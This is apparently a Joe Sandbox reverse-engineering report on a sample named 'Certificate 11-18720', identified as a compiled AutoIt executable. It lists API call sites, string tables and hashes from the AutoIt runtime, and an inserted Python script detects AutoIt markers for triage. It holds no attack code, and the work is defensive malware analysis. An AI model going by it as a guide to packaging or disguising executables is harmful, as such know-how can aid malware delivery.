• RegCreateKeyExW.ADVAPI32(?,?,00000000,0065DC00,00000000,?,00000000,?,?), ref: 006237A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006237EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00623874
• RegCloseKey.ADVAPI32(?), ref: 00623B94
• RegCloseKey.ADVAPI32(00000000), ref: 00623BA1
Strings
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: f28ad2626e968f0cf9ae131d508269b35d8ed10d1fe00579feaca1f36f557aec
• Instruction ID: 8cae65148fa12492e69258f2cd5ba36a1d0f54aca6fc8e7ece344be9cf48016a
• Opcode Fuzzy Hash: f28ad2626e968f0cf9ae131d508269b35d8ed10d1fe00579feaca1f36f557aec
• Instruction Fuzzy Hash: B0027B756006629FCB14EF54D849E1ABBE6FF89710F04885DF98A9B3A1CB34ED41CB81
APIs
• CharUpperBuffW.USER32(?,?), ref: 00626C56
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00626D16
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 0d1f7d792480b829c5cfbc1c99b4f4ef755fb2147854da87b51cc15e4bfebe62
• Instruction ID: fbb5a9fb4fd13488b9bccdfede2638690c98620d0931ba1374e16127ce88c3a0
• Opcode Fuzzy Hash: 0d1f7d792480b829c5cfbc1c99b4f4ef755fb2147854da87b51cc15e4bfebe62
• Instruction Fuzzy Hash: 02A1B0302146569FCB14EF14D845E6ABBA6BF84310F10496EB9969B3E2DF30EC06CF41
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 005FCF91
• __swprintf.LIBCMT ref: 005FD032
• _wcscmp.LIBCMT ref: 005FD045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005FD09A
• _wcscmp.LIBCMT ref: 005FD0D6
• GetClassNameW.USER32(?,?,00000400), ref: 005FD10D
• GetDlgCtrlID.USER32(?), ref: 005FD15F
• GetWindowRect.USER32(?,?), ref: 005FD195
• GetParent.USER32(?), ref: 005FD1B3
• ScreenToClient.USER32(00000000), ref: 005FD1BA
• GetClassNameW.USER32(?,?,00000100), ref: 005FD234
• _wcscmp.LIBCMT ref: 005FD248
• GetWindowTextW.USER32(?,?,00000400), ref: 005FD26E
• _wcscmp.LIBCMT ref: 005FD282
Strings
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
• Opcode ID: 2a99d37d4e7e05542afe346699833358ac761ddd99277c63053ebc4d23e64bb1
• Instruction ID: 6e2a199cae64a74f03d6e6909d58a09ca6ab5abf36363571867106d3599566b0
• Opcode Fuzzy Hash: 2a99d37d4e7e05542afe346699833358ac761ddd99277c63053ebc4d23e64bb1
• Instruction Fuzzy Hash: F7A1D37560470AAFC715DF64C884FBABBAAFF44354F004619FA9992180DB34EA45CBE1
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 005FD8EB
• _wcscmp.LIBCMT ref: 005FD8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 005FD924
• CharUpperBuffW.USER32(?,00000000), ref: 005FD941
• _wcscmp.LIBCMT ref: 005FD95F
• _wcsstr.LIBCMT ref: 005FD970
• GetClassNameW.USER32(00000018,?,00000400), ref: 005FD9A8
• _wcscmp.LIBCMT ref: 005FD9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 005FD9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 005FDA28
• _wcscmp.LIBCMT ref: 005FDA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 005FDA60
• GetWindowRect.USER32(00000004,?), ref: 005FDAC9
Strings
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 41200da60b3d0c50c21a702412c82ff7800c6b1370516e8683fd48ad5179c7f2
• Instruction ID: 6ab9102168ea52a094c66912fc5dad8c73d4c491f51cbfe2d0c5dbdbc7e3fbff
• Opcode Fuzzy Hash: 41200da60b3d0c50c21a702412c82ff7800c6b1370516e8683fd48ad5179c7f2
• Instruction Fuzzy Hash: 3881B03100834A9BDB05DF50C985F7A7FAAFF84314F04846AFE899A096DB78DD45CBA1
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 2a2dd994e08060362046ad165769bc7c6faa2b210140e7d0f99b1e9b02332df0
• Instruction ID: de11312a00ed9840980d1b679880b17f7182360902a2eea773f199df70970df8
• Opcode Fuzzy Hash: 2a2dd994e08060362046ad165769bc7c6faa2b210140e7d0f99b1e9b02332df0
• Instruction Fuzzy Hash: 35319E3194420BEADB15FA90CD6BFAEBBB6BF60744F200029F585750D1EB65AE44C621
APIs
• LoadIconW.USER32(00000063), ref: 005FEAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005FEAC2
• SetWindowTextW.USER32(?,?), ref: 005FEAD9
• GetDlgItem.USER32(?,000003EA), ref: 005FEAEE
• SetWindowTextW.USER32(00000000,?), ref: 005FEAF4
• GetDlgItem.USER32(?,000003E9), ref: 005FEB04
• SetWindowTextW.USER32(00000000,?), ref: 005FEB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005FEB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005FEB45
• GetWindowRect.USER32(?,?), ref: 005FEB4E
• SetWindowTextW.USER32(?,?), ref: 005FEBB9
• GetDesktopWindow.USER32 ref: 005FEBBF
• GetWindowRect.USER32(00000000), ref: 005FEBC6
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 005FEC12
• GetClientRect.USER32(?,?), ref: 005FEC1F
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 005FEC44
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005FEC6F
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: ba59c949c67a4be0a8994edef05fb436678e1a1906474be20f1cbb287db98789
• Instruction ID: 50163592998ae61048f87785d7d0aebdf2a2fc6f8525a5a924640a3e0e88d715
• Opcode Fuzzy Hash: ba59c949c67a4be0a8994edef05fb436678e1a1906474be20f1cbb287db98789
• Instruction Fuzzy Hash: B2513B75900709EFDB21DFA8CD8AF6EBBF6FF04705F004928E696A25A0D774A945CB10
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 006179C6
• LoadCursorW.USER32(00000000,00007F00), ref: 006179D1
• LoadCursorW.USER32(00000000,00007F03), ref: 006179DC
• LoadCursorW.USER32(00000000,00007F8B), ref: 006179E7
• LoadCursorW.USER32(00000000,00007F01), ref: 006179F2
• LoadCursorW.USER32(00000000,00007F81), ref: 006179FD
• LoadCursorW.USER32(00000000,00007F88), ref: 00617A08
• LoadCursorW.USER32(00000000,00007F80), ref: 00617A13
• LoadCursorW.USER32(00000000,00007F86), ref: 00617A1E
• LoadCursorW.USER32(00000000,00007F83), ref: 00617A29
• LoadCursorW.USER32(00000000,00007F85), ref: 00617A34
• LoadCursorW.USER32(00000000,00007F82), ref: 00617A3F
• LoadCursorW.USER32(00000000,00007F84), ref: 00617A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 00617A55
• LoadCursorW.USER32(00000000,00007F02), ref: 00617A60
• LoadCursorW.USER32(00000000,00007F89), ref: 00617A6B
• GetCursorInfo.USER32(?), ref: 00617A7B
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 109bae810effd53ccf3ffd0e712bbbb844a000e6c7c8706fce3c027288911156
• Instruction ID: 4dfdbef0bc55962d4f14c3ff3c7b36bb6613b4013d7ad969254a2f65d05b47fb
• Opcode Fuzzy Hash: 109bae810effd53ccf3ffd0e712bbbb844a000e6c7c8706fce3c027288911156
• Instruction Fuzzy Hash: 033127B0D4831A6ADB109FB68C8999FBFF9FF04750F54452BE50DE7280DA78A5408FA1
APIs
  • Part of subcall function 005DE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005CC8B7,?,00002000,?,?,00000000,?,005C419E,?,?,?,0065DC00), ref: 005DE984
  • Part of subcall function 005C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C53B1,?,?,005C61FF,?,00000000,00000001,00000000), ref: 005C662F
• __wsplitpath.LIBCMT ref: 005CC93E
  • Part of subcall function 005E1DFC: __wsplitpath_helper.LIBCMT ref: 005E1E3C
• _wcscpy.LIBCMT ref: 005CC953
• _wcscat.LIBCMT ref: 005CC968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 005CC978
• SetCurrentDirectoryW.KERNEL32(?), ref: 005CCABE
  • Part of subcall function 005CB337: _wcscpy.LIBCMT ref: 005CB36F
Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 2258743419-1018226102
                                                                                    • Opcode ID: 6e2a4c3e915743be8d5a8a0818cff35500180f072b34b833ea98c7675304d619
                                                                                    • Instruction ID: eae33e6afbc12d07016485db603a896c806826219e7703dcbe56aafe30b1de08
                                                                                    • Opcode Fuzzy Hash: 6e2a4c3e915743be8d5a8a0818cff35500180f072b34b833ea98c7675304d619
                                                                                    • Instruction Fuzzy Hash: 32127B715083429FC724EF64C895EAFBBE6BFC9304F40491EF58997291DB309A49CB92
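The routine above is the AutoIt runtime's script loader: its string table carries the markers the interpreter uses to find the script embedded in the executable (`AU3!`, `EA06`, `>>>AUTOIT SCRIPT<<<`), which is what makes the "Binary is likely a compiled AutoIt script file" verdict cheap to reproduce. The following Python is an added triage example, not part of the Joe Sandbox report or of the AutoIt project. It treats the concatenated token `AU3!EA06` as the signature to look for (an assumption drawn from the compiled-AutoIt format, since the report lists the two halves as separate strings), and the sample buffer, offsets and function names are constructed for illustration.

```python
"""Locate compiled-AutoIt markers in a binary (added triage example, not report or AutoIt code)."""
import re
import sys

# Marker strings seen in the interpreter's loader routine. Assumption: the
# loader compares against "AU3!" immediately followed by "EA06"; the tag
# ">>>AUTOIT SCRIPT<<<" is matched on its own.
AU3_SIGNATURE = b"AU3!EA06"
AU3_SCRIPT_TAG = b">>>AUTOIT SCRIPT<<<"

# Constructed sample: an MZ/PE-looking prefix with both markers appended at
# known offsets (168 and 192). Not a real executable.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"PE\x00\x00" + b"\x00" * 100
    + AU3_SIGNATURE + b"\x00" * 16
    + AU3_SCRIPT_TAG
)


def find_autoit_markers(data: bytes) -> dict:
    """Return every offset at which each marker occurs in `data`."""
    return {
        "au3_signature": [m.start() for m in re.finditer(re.escape(AU3_SIGNATURE), data)],
        "script_tag": [m.start() for m in re.finditer(re.escape(AU3_SCRIPT_TAG), data)],
    }


def is_probable_compiled_autoit(data: bytes) -> bool:
    """True when either marker is present anywhere in the buffer."""
    hits = find_autoit_markers(data)
    return bool(hits["au3_signature"] or hits["script_tag"])


def summarize(data: bytes) -> str:
    """One-line human-readable verdict plus marker offsets (hex)."""
    hits = find_autoit_markers(data)
    verdict = "probable compiled AutoIt" if is_probable_compiled_autoit(data) else "no AutoIt markers"
    sig = ", ".join(hex(o) for o in hits["au3_signature"]) or "-"
    tag = ", ".join(hex(o) for o in hits["script_tag"]) or "-"
    return f"{verdict}; AU3!EA06 at [{sig}]; >>>AUTOIT SCRIPT<<< at [{tag}]"


def scan_file(path: str) -> str:
    """Read a file from disk and summarize its markers."""
    with open(path, "rb") as fh:
        return summarize(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(scan_file(sys.argv[1]))
    else:
        print(summarize(SAMPLE))
```

A hit only tells you the file is an AutoIt stub wrapping a script; the stub's own string table (the very strings listed above) is what matches, so the next step is to carve and decompile the embedded script rather than spend time reversing the interpreter, whose USER32/OLEAUT32/WINMM routines in the following blocks are ordinary AutoIt runtime library code.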
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0062CEFB
                                                                                    • DestroyWindow.USER32(?,?), ref: 0062CF73
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0062CFF4
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0062D016
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062D025
                                                                                    • DestroyWindow.USER32(?), ref: 0062D042
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005C0000,00000000), ref: 0062D075
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062D094
                                                                                    • GetDesktopWindow.USER32 ref: 0062D0A9
                                                                                    • GetWindowRect.USER32(00000000), ref: 0062D0B0
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0062D0C2
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0062D0DA
                                                                                      • Part of subcall function 005DB526: GetWindowLongW.USER32(?,000000EB), ref: 005DB537
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 3877571568-3619404913
                                                                                    • Opcode ID: b5dfdce966b3ea54a3c605b00ad819dec0387015a7e3a934060bd5d786071c1e
                                                                                    • Instruction ID: 8a8e6b25e2fafb869a95880cb7a8c96cf51807d1252608ab388f0e6a5e24b25c
                                                                                    • Opcode Fuzzy Hash: b5dfdce966b3ea54a3c605b00ad819dec0387015a7e3a934060bd5d786071c1e
                                                                                    • Instruction Fuzzy Hash: 2571ABB4140705AFD724DF28DC85FAA7BEAEB89704F04461DF9858B3A1D771E942CB22
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0062F37A
                                                                                      • Part of subcall function 0062D7DE: ClientToScreen.USER32(?,?), ref: 0062D807
                                                                                      • Part of subcall function 0062D7DE: GetWindowRect.USER32(?,?), ref: 0062D87D
                                                                                      • Part of subcall function 0062D7DE: PtInRect.USER32(?,?,0062ED5A), ref: 0062D88D
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0062F3E3
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0062F3EE
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0062F411
                                                                                    • _wcscat.LIBCMT ref: 0062F441
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0062F458
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0062F471
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0062F488
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0062F4AA
                                                                                    • DragFinish.SHELL32(?), ref: 0062F4B1
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0062F59C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 2fd2152c318d51ac4d64c63949f09755bcbaacc283468b8d4e14cd63d8e796fe
                                                                                    • Instruction ID: 43426111108ea794b8905a22c629fc070c77528caf5577f67b1dabf51dd8a239
                                                                                    • Opcode Fuzzy Hash: 2fd2152c318d51ac4d64c63949f09755bcbaacc283468b8d4e14cd63d8e796fe
                                                                                    • Instruction Fuzzy Hash: 1F613871508301AFC311EFA4DC89E9FBBF9BF89710F004A2EF595961A1DB709A49CB52
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0060AB3D
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0060AB46
                                                                                    • VariantClear.OLEAUT32(?), ref: 0060AB52
                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0060AC40
                                                                                    • __swprintf.LIBCMT ref: 0060AC70
                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0060AC9C
                                                                                    • VariantInit.OLEAUT32(?), ref: 0060AD4D
                                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0060ADDF
                                                                                    • VariantClear.OLEAUT32(?), ref: 0060AE35
                                                                                    • VariantClear.OLEAUT32(?), ref: 0060AE44
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0060AE80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                    • API String ID: 3730832054-3931177956
                                                                                    • Opcode ID: 68405275ea7c8817fd9f41d0bc7e55b6814b8c69f932d0d40d424434991cca2d
                                                                                    • Instruction ID: 96aadc8e1d600c1666146f1b6157d9d00806e13a63cb0439a8d4bb23b32c1ebc
                                                                                    • Opcode Fuzzy Hash: 68405275ea7c8817fd9f41d0bc7e55b6814b8c69f932d0d40d424434991cca2d
                                                                                    • Instruction Fuzzy Hash: D0D1C071A80206DBDB289F95C885BABBBF7FF44740F14805AE4059B2C1DB74EC41DBA2
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 006271FC
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00627247
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: 9f7356f5c9fabf453ca6225bfeb08f6bad6f177cf3e47a1a17a6fbd96f03436e
                                                                                    • Instruction ID: aaec913ee9e8f604f2f7dda1f424149c2bba71631ef65cdd96953e4b8fd23f8c
                                                                                    • Opcode Fuzzy Hash: 9f7356f5c9fabf453ca6225bfeb08f6bad6f177cf3e47a1a17a6fbd96f03436e
                                                                                    • Instruction Fuzzy Hash: 87916E342086569FCB14EF24D855E6EBFA2BF94310F00485DF8965B3A2DB30ED0ACB81
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,005FCF50), ref: 005FCE90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: 4+g$CLASS$CLASSNN$H+g$INSTANCE$L+g$NAME$P+g$REGEXPCLASS$T+g$TEXT
                                                                                    • API String ID: 3555792229-2037624313
                                                                                    • Opcode ID: 609a3c1b042fed865262b1adb6379ec52bb3c947da62037bba83eb07091ec8d9
                                                                                    • Instruction ID: 90117e47fe80186d6bfeba6ac02c3004e50bb1bc2edbfe8e18f35451a6756126
                                                                                    • Opcode Fuzzy Hash: 609a3c1b042fed865262b1adb6379ec52bb3c947da62037bba83eb07091ec8d9
                                                                                    • Instruction Fuzzy Hash: 48919030A0054FABCB19EFA0C586BFAFF79BF44300F50852AD659A7251DF346959CB90
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0062E5AB
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00629808,?), ref: 0062E607
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0062E647
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0062E68C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0062E6C3
                                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,00629808,?), ref: 0062E6CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0062E6DF
                                                                                    • DestroyIcon.USER32(?), ref: 0062E6EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0062E70B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0062E717
                                                                                      • Part of subcall function 005E0FA7: __wcsicmp_l.LIBCMT ref: 005E1030
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: a9d046660800a1d49b7d5fe4d059b143915862b5766c5a6105ab84220a98cc6f
                                                                                    • Instruction ID: 5f91cd8a11899afb3488553c47a3eef9b98d1d6ff44b9bcf9eedafc10987c92e
                                                                                    • Opcode Fuzzy Hash: a9d046660800a1d49b7d5fe4d059b143915862b5766c5a6105ab84220a98cc6f
                                                                                    • Instruction Fuzzy Hash: D961D371900A25BEEB24DF64DC4AFFE7BA9BB18714F104125F915E61D0EBB19D80CB60
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0060D292
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0060D2DF
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0060D327
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0060D35E
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0060D38C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 1148790751-4113822522
                                                                                    • Opcode ID: ae7ce7f40a2fcf998fc133bdf7e362db8e9a36bd199b823a1744d291a7043c29
                                                                                    • Instruction ID: eb1a3f1de48ca31a938293778fb61c751f915676a681681e3fb6ccf79dc28e2e
